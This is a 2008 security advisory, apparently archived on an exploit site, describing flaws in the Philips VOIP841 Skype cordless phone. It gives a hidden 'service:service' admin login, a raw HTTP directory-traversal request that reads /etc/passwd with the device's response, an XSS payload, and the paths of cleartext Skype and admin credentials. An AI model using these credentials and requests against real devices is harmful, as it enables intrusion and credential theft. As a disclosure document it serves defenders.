exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Feb 14, 2008
Authored by Luca Carettoni | Site securenetwork.it

The Philips VOIP841 DECT cordless phone with an embedded Skype client suffers from a hidden administrative interface with a default login, directory traversal, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | ca377cc63b1fdc961af36a095f187918a72cd8179c8b5930245727e8467eb649


Change Mirror Download
Secure Network - Security Research Advisory

Vuln name: Philips VOIP841 Multiple Vulnerabilities
Systems affected: Philips VOIP841, Firmware Version and, Web Server Version 1.5 (simple httpd)
Systems not affected: n/a
Severity: High
Local/Remote: Remote
Vendor URL: http://www.consumer.philips.com/consumer
Author(s): Luca "ikki" Carettoni - luca.carettoni@securenetwork.it
Vendor disclosure: 23rd January 2008
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 14th February 2008
Advisory number: SN-2008-01
Advisory URL: http://www.securenetwork.it/advisories/, http://www.ikkisoft.com

*** SUMMARY ***

VOIP841 is one of the first DECT cordless phones with an embedded Skype client.
Without a computer, it is possible to call directly other Skype users or international numbers using SkypeOut
as well as the regular PSTN line. It is important to notice that it is Skype Certified and presented as a best seller
on the "Skype Shop" online.

Multiple vulnerabilities have been found in the latest version of this VOIP phone, ranging from an hidden administration
account to XSS and directory traversal. Various consequences are associated with these issues, such as theft
of Skype authentication credentials stored in the phone and information disclosure.

In order to exploit some vulnerabilities, a regular user should be authenticated.
However, using the hidden administration account it is possible to easily bypass this security mechanism.


(a) Hidden Administration Account
The device provides a comfortable web management console, protected with a basic HTML Authentication.
The default account is set to "Philips:voip841".

We discovered an hidden administration account which is probably used during technical remote assistance.
In the file "/var/cnxt/service", there is the BASE64 string "c2VydmljZTpzZXJ2aWNl" which represents
the account "service:service".

Using these credentials it is possible to login into the web administration console with admin privileges.
The previous user enables also a "secret" tab called [Change MAC Address] where it is possible (as the name implies)
to change the hardware address of the network interface.

(b) Directory Listing, Directory Traversal
The embedded webserver doesn't sanitize any kind of user input. The directory listing option is also enabled.
Using the previous account it is possible to browse every directory on the device and to retrieve the content
of any file with a simple HTTP request.

Let's see a self explaining example:

jungle ikki $ telnet 80
Connected to
Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Authorization: Basic c2VydmljZTpzZXJ2aWNl

HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

demo:x:5000:100:Demo User:/home/demo:/bin/bash
Connection closed by foreign host.

(c) Cross Site Scripting (XSS)
Due to the absence of input filters it is possible to inject scripting code inside the 404 standard response page.
In this way it is possible to trigger XSS attacks with a simple HTTP request like the following:

GET /var/htdocs/<script>alert("XSS");</script> HTTP/1.0

<html><head><title>404 File Not Found</title></head>
httpd server: The requested URL '/var/htdocs/<script>alert("XSS");</script>' was not found on this server.

(d) Insecure Storage
Browsing the device filesystem, we have noticed the presence of sensitive information stored in an insecure way.

Just to show the possible risks, we report the possibility to retrieve Skype credentials used by the device
and inserted by the user during the configuration process.
In the file "/var/jffs2/data/save.dat", the embedded Skype client stores temporary information such as
the Skype account (username and password) in clear text.

Another issue is related to the change password procedure for the web management console: every operation
done on the web console is logged on a temporary file present in the directory "/tmp".
When an administrator changes the web authentication password, the old and the new values are revealed into
the file "apply.log" generated by the cgi-bin called "apply".

###### CUT HERE ######
<22:02:11.940000> apply cgi start...
<22:02:11.940000> Content length : 64
<22:02:11.940000> btn_action=admin&edit_pwd1=ikki&edit_pwd2=ikki&rb_defaults=rb_no
<22:02:11.940000> 0 : [btn_action] = [admin]
<22:02:11.940000> 1 : [edit_pwd1] = [ikki]
<22:02:11.940000> 2 : [edit_pwd2] = [ikki]
<22:02:11.940000> 3 : [rb_defaults] = [rb_no]
<22:02:11.940000> Action : [4] admin
<22:02:11.940000> OldUser:philips:voip841
<22:02:11.940000> NewUser:ikki
<22:02:11.940000> Encoded:philips:ikki
###### CUT HERE ######

*** EXPLOIT ***

Attackers may exploit these issues through a common browser as explained




Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.

This advisory is copyright © 2008 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By